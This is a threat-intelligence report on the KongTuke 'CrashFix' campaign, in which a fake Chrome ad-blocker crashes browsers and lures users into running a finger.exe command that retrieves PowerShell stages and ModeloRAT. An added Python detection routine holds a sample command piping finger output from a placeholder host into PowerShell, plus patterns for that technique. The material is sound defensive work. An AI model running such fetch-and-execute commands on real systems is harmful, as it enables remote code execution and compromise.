KongTuke Campaign Delivers ModeloRAT Malware via Malicious Chrome Ad Blocker Extension

Cybersecurity researchers have detailed the ongoing "KongTuke" campaign, which employs a malicious Google Chrome extension to intentionally crash web browsers and deceive users into executing arbitrary commands. This attack, dubbed "CrashFix" by Huntress, delivers a previously undocumented remote access trojan (RAT) known as ModeloRAT. The malicious extension, identified as "NexShield – Advanced Web Guardian," masqueraded as an ad blocker and was downloaded over 5,000 times before its removal from the Chrome Web Store. The extension is a near-identical copy of the legitimate uBlock Origin Lite.

Attack Mechanism

The KongTuke campaign, also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124, is a traffic distribution system that profiles victim hosts before redirecting them to a payload delivery site. This infrastructure has been leveraged by various cybercriminal groups, including Rhysida ransomware, Interlock ransomware, and TA866 (Asylum Ambuscade).

In the documented attack chain:

  • Victims searching for an ad blocker encountered a malicious advertisement, leading them to the "NexShield" extension.
  • The extension is designed to display a fake security warning claiming the browser stopped abnormally, prompting users to run a "scan."
  • If a user opts to scan, they receive instructions to open the Windows Run dialog and execute a command that the extension has already copied to the clipboard.
  • This command initiates a denial-of-service (DoS) condition: an infinite loop opens new runtime port connections until memory consumption freezes and crashes the browser.
  • The extension transmits a unique ID to an attacker-controlled server ("nexsnield[.]com") for victim tracking.
  • Malicious behavior is delayed, activating 60 minutes post-installation and subsequently every 10 minutes.
  • The fake security warning reappears upon browser restart if the extension remains installed.
  • Anti-analysis techniques are used, such as disabling right-click menus and developer tool shortcuts.

Payload Delivery and ModeloRAT

The CrashFix command utilizes the legitimate Windows utility finger.exe to retrieve the next-stage payload from an attacker-controlled server ("199.217.98[.]108"). This payload is a PowerShell command that retrieves a secondary PowerShell script. That script employs multiple layers of Base64 encoding and XOR operations to conceal the final malware, similar to methods used by SocGholish.
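As an added example (not code from the page or from Huntress), the following Python routine flags the finger.exe payload-retrieval pattern described above in process-creation telemetry: finger.exe querying a remote host, finger output piped into an interpreter, and an interpreter launched from explorer.exe (the Run dialog's parent) with finger on its command line. The Sysmon-like field names, the sample events and the 203.0.113.10 address are all constructed for this example.

```python
import re

# Constructed process-creation events (not from the page); Sysmon-like field names.
SAMPLE_EVENTS = [
    {"ts": "2025-01-01T10:00:00Z", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c finger a@203.0.113.10 | powershell -"},
    {"ts": "2025-01-01T10:00:01Z", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\finger.exe",
     "cmdline": r"finger a@203.0.113.10"},
    {"ts": "2025-01-01T10:00:02Z", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r"chrome.exe --restore-last-session"},
    {"ts": "2025-01-01T10:05:00Z", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\finger.exe",
     "cmdline": r"finger"},  # no remote host: a local query, not flagged
]

# An argument of the form [user@]host, where host is an IPv4 address or a dotted name.
HOST = re.compile(r"^(?:\S+@)?((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)$", re.I)
# finger ... | ... powershell/pwsh/cmd: its output is being fed to an interpreter.
PIPE_TO_SHELL = re.compile(r"\bfinger(?:\.exe)?\b[^|]*\|.*\b(?:powershell|pwsh|cmd)\b", re.I)
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_host(cmdline):
    """Return the host finger.exe is asked to query, or None for a local query."""
    for tok in cmdline.split()[1:]:
        m = HOST.match(tok)
        if m:
            return m.group(1)
    return None


def classify(ev):
    """Return detection labels for one event; an empty list means nothing suspicious."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    hits = []
    if img == "finger.exe" and remote_host(cmd):
        hits.append("finger_remote_query")
    if PIPE_TO_SHELL.search(cmd):
        hits.append("finger_piped_to_interpreter")
    if img in INTERPRETERS and parent == "explorer.exe" and "finger" in cmd.lower():
        hits.append("run_dialog_finger_launch")
    return hits


def detect(events):
    """Run every rule over a stream of events and return (timestamp, label) findings."""
    return [(ev["ts"], label) for ev in events for label in classify(ev)]
```

Any of the three labels is worth an alert on a workstation, since finger.exe has no routine business use there; the first two together with a browser crash shortly before are the CrashFix sequence.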

The decrypted payload performs several checks:

  • It scans for over 50 analysis tools and virtual machine indicators, ceasing execution if detected.
  • It determines if the machine is domain-joined or standalone.
  • It sends an HTTP POST request to the server, including a list of installed antivirus products and a flag indicating the machine type ("ABCD111" for standalone, "BCDA222" for domain-joined hosts).

If the compromised system is domain-joined, the attack culminates in the deployment of ModeloRAT. This is a Python-based Windows remote access trojan that uses RC4 encryption for command-and-control (C2) communications to servers such as "170.168.103[.]208" or "158.247.252[.]178". ModeloRAT establishes persistence via the Windows Registry and can execute binaries, DLLs, Python scripts, and PowerShell commands. It also includes self-update and termination capabilities, and varies its beaconing logic to evade detection. For standalone workstations, a separate multi-stage infection sequence occurs, in which the C2 server responds with a "TEST PAYLOAD!!!!" message, suggesting that this branch may still be in a testing phase.

This campaign demonstrates an evolution in social engineering tactics, leveraging user frustration caused by browser crashes to facilitate further infection.